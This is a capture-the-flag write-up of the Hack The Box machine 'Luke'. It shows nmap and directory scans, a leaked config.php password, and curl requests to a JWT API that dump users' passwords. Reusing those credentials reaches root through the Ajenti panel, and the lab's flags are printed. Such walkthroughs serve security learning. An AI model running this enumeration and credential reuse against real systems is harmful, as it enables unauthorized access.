Hack The Box: Luke write-up
Post
Cancel

Hack The Box: Luke machine write-up

This machine, that runs with ip 10.10.10.137, was pretty straigthforward, it was only based on thorough enumeration. One aspect I really liked is that I got to learn a lot about how a JWT token service is implemented, as we needed to register to get a token and therefore be able to access more sensitive information. Let’s dig in!

Enumeration

We start by enumerating open ports to discover the services running in the machine. I open up nmap:

Result of first nmap scan

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 $nmap -sV -sC 10.10.10.137 Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-31 21:42 BST Nmap scan report for 10.10.10.137 Host is up (0.028s latency). Not shown: 995 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3+ (ext.1) | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 0 0 512 Apr 14 12:35 webapp | ftp-syst: | STAT: | FTP server status: | Connected to 10.10.12.142 | Logged in as ftp | TYPE: ASCII | No session upload bandwidth limit | No session download bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 5 | vsFTPd 3.0.3+ (ext.1) - secure, fast, stable |_End of status 22/tcp open ssh? 80/tcp open http Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3 |_http-title: Luke 3000/tcp open http Node.js Express framework |_http-title: Site doesn't have a title (application/json; charset=utf-8). 8000/tcp open http Ajenti http control panel |_http-title: Ajenti Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 178.58 seconds  Many services available, so I’ll go one by one inspecting what they have. Services enumertion FTP I started by inspecting ftp, so I logged in as anonymous and found a file, which is some sort of message from Jerry to Chihiro. Good, we have some usernames and a mention of some source code, interesting… FTP commands used I used the command get for_Chihiro.txt - to see the output in the console, removing the last dash downloads the file to our local computer. The note is not of much use and there is nothing else, so I might as well move on. Port 80, HTTP server Here is what we find, a simple static webpage. I looked for content, but it was empty so I ran dirbuster. Here’s the output: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 DirBuster 1.0-RC1 - Report http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project Report produced on Fri May 31 21:56:03 BST 2019 -------------------------------- http://10.10.10.137:80 -------------------------------- Directories found during testing: Dirs found with a 200 response: / /vendor/ /js/ /vendor/jquery/ /vendor/bootstrap/ /vendor/bootstrap/js/ /vendor/jquery-easing/ /vendor/bootstrap/css/ /member/ /css/ Dirs found with a 401 response: /management/ -------------------------------- Files found during testing: Files found with a 200 responce: /index.html /login.php /vendor/jquery/jquery.min.js /vendor/bootstrap/js/bootstrap.bundle.min.js /js/scrolling-nav.js /vendor/jquery-easing/jquery.easing.min.js /vendor/jquery/jquery.js /vendor/jquery/jquery.min.map /vendor/bootstrap/js/bootstrap.bundle.js /vendor/jquery/jquery.slim.js /vendor/jquery-easing/jquery.easing.compatibility.js /vendor/jquery/jquery.slim.min.js /vendor/bootstrap/js/bootstrap.bundle.js.map /vendor/jquery/jquery.slim.min.map /vendor/bootstrap/js/bootstrap.bundle.min.js.map /vendor/bootstrap/js/bootstrap.js /vendor/jquery-easing/jquery.easing.js /vendor/bootstrap/css/bootstrap.css /vendor/bootstrap/js/bootstrap.js.map /vendor/bootstrap/js/bootstrap.min.js /vendor/bootstrap/js/bootstrap.min.js.map /vendor/bootstrap/css/bootstrap.css.map /vendor/bootstrap/css/bootstrap.min.css /vendor/bootstrap/css/bootstrap.min.css.map /css/bootstrap.min.css /css/scrolling-nav.css /css/signin.css /config.php  Nothing was interesting… apart from the last file, config.php, and a directory that was password protected, /management/. I curl‘ed the php file and voilà, first credentials found! 1 2 3 4 5 6$dbHost = 'localhost'; $dbUsername = 'root';$dbPassword = 'Zk6heYCyv6ZE9Xcg'; $db = "login";$conn = new mysqli($dbHost,$dbUsername, $dbPassword,$db) or die("Connect failed: %s\n". $conn -> error);  I tried to use them to access /management/ but no use, so I decided to move on to the next service. Port 3000: JWT token authentication I didn’t know what this service was, as at first when I tried to access it, it gave me a weird json response: Response from the service I decided to first enumerate the serivce with dirb: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 dirb http://10.10.10.137:3000 ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Jun 6 11:32:19 2019 URL_BASE: http://10.10.10.137:3000/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://10.10.10.137:3000/ ---- + http://10.10.10.137:3000/login (CODE:200|SIZE:13) + http://10.10.10.137:3000/Login (CODE:200|SIZE:13) + http://10.10.10.137:3000/users (CODE:200|SIZE:56) ----------------- END_TIME: Thu Jun 6 11:37:55 2019 DOWNLOADED: 4612 - FOUND: 3  Then, after getting the same message that I needed to authenticate, I googled the json string, which led me to find out that the service was implementing JWT tokens to authenticate users. Hence, I tried to use my credentials, which surprisingly worked! Authenticate as admin:Zk6heYCyv6ZE9Xcg to /login: 1$ curl -s -X POST -H "Content-Type: application/json" --data '{"password":"Zk6heYCyv6ZE9Xcg", "username":"admin"}' http://10.10.10.137:3000/login 

And the response is:

1 {"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTYxLCJleHAiOjE1NTk0MjQzNjF9.r0i77u8Nw9tZkPHCqlyYrAoP6VdautVo7mSpIb9jfL4"} 

Then, we can use the token to access some usernames under /users/:

1 2 $curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTgxLCJleHAiOjE1NTk0MjQzODF9.FaZX2S_Fsri6Xij_xz0ySQB7oKiTlD2XXGczd5VrEXA" http://10.10.10.137:3000/users/ [{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]  We can then access each of the users’ information with /users/{name} (I came across this on google): 1 2$ curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTgxLCJleHAiOjE1NTk0MjQzODF9.FaZX2S_Fsri6Xij_xz0ySQB7oKiTlD2XXGczd5VrEXA" http://10.10.10.137:3000/users/Admin {"name":"Admin","password":"WX5b7)>/rp$U)FW"}  1 2$ curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTgxLCJleHAiOjE1NTk0MjQzODF9.FaZX2S_Fsri6Xij_xz0ySQB7oKiTlD2XXGczd5VrEXA" http://10.10.10.137:3000/users/Derry {"name":"Derry","password":"rZ86wwLvx7jUxtch"} 
1 2 $curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTgxLCJleHAiOjE1NTk0MjQzODF9.FaZX2S_Fsri6Xij_xz0ySQB7oKiTlD2XXGczd5VrEXA" http://10.10.10.137:3000/users/Yuri {"name":"Yuri","password":"bet@tester87"}  1 2$ curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTU5MzM3OTgxLCJleHAiOjE1NTk0MjQzODF9.FaZX2S_Fsri6Xij_xz0ySQB7oKiTlD2XXGczd5VrEXA" http://10.10.10.137:3000/users/Dory {"name":"Dory","password":"5y:!xa=ybfe)/QD"} 

That’s a lot of credentials we got there! I tried to use them in the previous port under /management/ and one of them worked: Admin:WX5b7)>/rp\$U)FW.

Management directory holds sensitive information

Even more credentials: root:KpMasng6S5EtTy9Z. I didn’t have any more places to log in or authenticate so I decided to have a look at the third service.

Port 8000: Ajenti and getting root

The last service was Ajenti, a web management panel for servers. I was presented with a login panel:

That meant it was time to try credentials! The ones that worked were the last ones I had got hold of, root:KpMasng6S5EtTy9Z.

To my surprise, this was the end of the machine, this panel had root access to the whole machine, meaning we could get both hashes and even a terminal session:

Ajenti functionality

And so that’s it, we got both users in one shot:

user.txt: 58d441e500e8941f9cf3baa499e2e4da

root.txt: 8448343028fadde1e2a1b0a44d01e650

I hope you liked the write-up!